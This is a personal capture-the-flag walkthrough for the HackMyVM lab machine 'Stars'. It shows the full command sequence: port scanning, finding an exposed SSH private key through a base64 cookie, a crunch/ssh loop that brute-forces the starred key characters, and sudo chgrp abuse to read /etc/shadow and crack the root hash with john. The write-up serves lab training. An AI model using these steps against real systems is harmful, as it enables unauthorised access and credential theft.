NOTES ABOUT Stars

[ 2022-11-08 ] [ HackMyVM / Stars ]

Status: Rooted
Skills: Port Scanning, Fuzzing, OpenSSH, Bash Scripting, Password Cracking
Tools: nmap, gobuster, ssh, crunch, john

PORT SCANNING

$ nmap -sCSV -p- 10.0.2.42

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
| 256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_ 256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Cours PHP & MySQL
|_http-server-header: Apache/2.4.51 (Debian)

GETTING IN

$ curl -v 10.0.2.42
[...]
< Set-Cookie: cookie=cG9pc29uZWRnaWZ0LnR4dA%3D%3D
[...]

$ echo cG9pc29uZWRnaWZ0LnR4dA== | base64 -d
poisonedgift.txt

$ curl 10.0.2.42/poisonedgift.txt
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAsruS5/Cd7clZ+SJJj0cvBPtTb9mfFvoO/FDtQ1i8ft3IZC9tHsKP

$ wget 10.0.2.42/poisonedgift.txt

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.42
/sshnote.txt (Status: 200) [Size: 117]

$ curl 10.0.2.42/sshnote.txt
My RSA key is messed up, it looks like 3 capital letters have been replaced by stars.
Can you try to fix it?

sophie

$ touch fixed
$ chmod 600 fixed

for i in $(crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ); do
echo $i; sed "s/\*\*\*/$i/" poisonedgift.txt > fixed;
ssh -i fixed sophie@10.0.2.42;
done

AAA
sophie@10.0.2.42: Permission denied (publickey).
AAB
sophie@10.0.2.42: Permission denied (publickey).
[...]
Linux debian 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64
Last login: Sun Oct 17 13:39:16 2021 from 192.168.0.28
sophie@debian:~$ cat user.txt
***************

ELEVATING PRIVILEGES

sophie@debian:~$ sudo -l
Matching Defaults entries for sophie on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sophie may run the following commands on debian:
(ALL : ALL) NOPASSWD: /usr/bin/chgrp

sophie@debian:/etc$ cat passwd
root:x:0:0:root:/root:/bin/bash
sophie:x:1001:1001:,,,:/home/sophie:/bin/bash

sophie@debian:/etc$ sudo chgrp 1001 /etc/shadow
sophie@debian:/etc$ cat /etc/shadow
root:$1$root$dZ6JC474uVpAeG8g0oh/7.:18917:0:99999:7:::
sophie:$y$j9T$mD6gcz0.6rC4ZwGpDem3o0$HzDd6YXLy3Dsht17WVVX7v7ReGcJ9PXhG/B3bx4Nz/C:18917:0:99999:7:::

$ unshadow ./passwd ./shadow > pass.txt 

$ cat pass.txt
root:$1$root$dZ6JC474uVpAeG8g0oh/7.:0:0:root:/root:/bin/bash
sophie:$y$j9T$mD6gcz0.6rC4ZwGpDem3o0$HzDd6YXLy3Dsht17WVVX7v7ReGcJ9PXhG/B3bx4Nz/C:1001:1001:,,,:/home/sophie:/bin/bash

$ john --wordlist=/usr/share/wordlists/rockyou.txt --rules ./pass.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********* (root)
1g 0:00:00:04 DONE (2022-11-08 13:40) 0.2314g/s 6600p/s 6600c/s 6600C/s camera1..240787
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

root@debian:~# cat root.txt 
*****************

root@debian:~# systemctl poweroff
root@debian:~# Connection to 10.0.2.42 closed by remote host.
Connection to 10.0.2.42 closed.

--- Loaded 512 times ---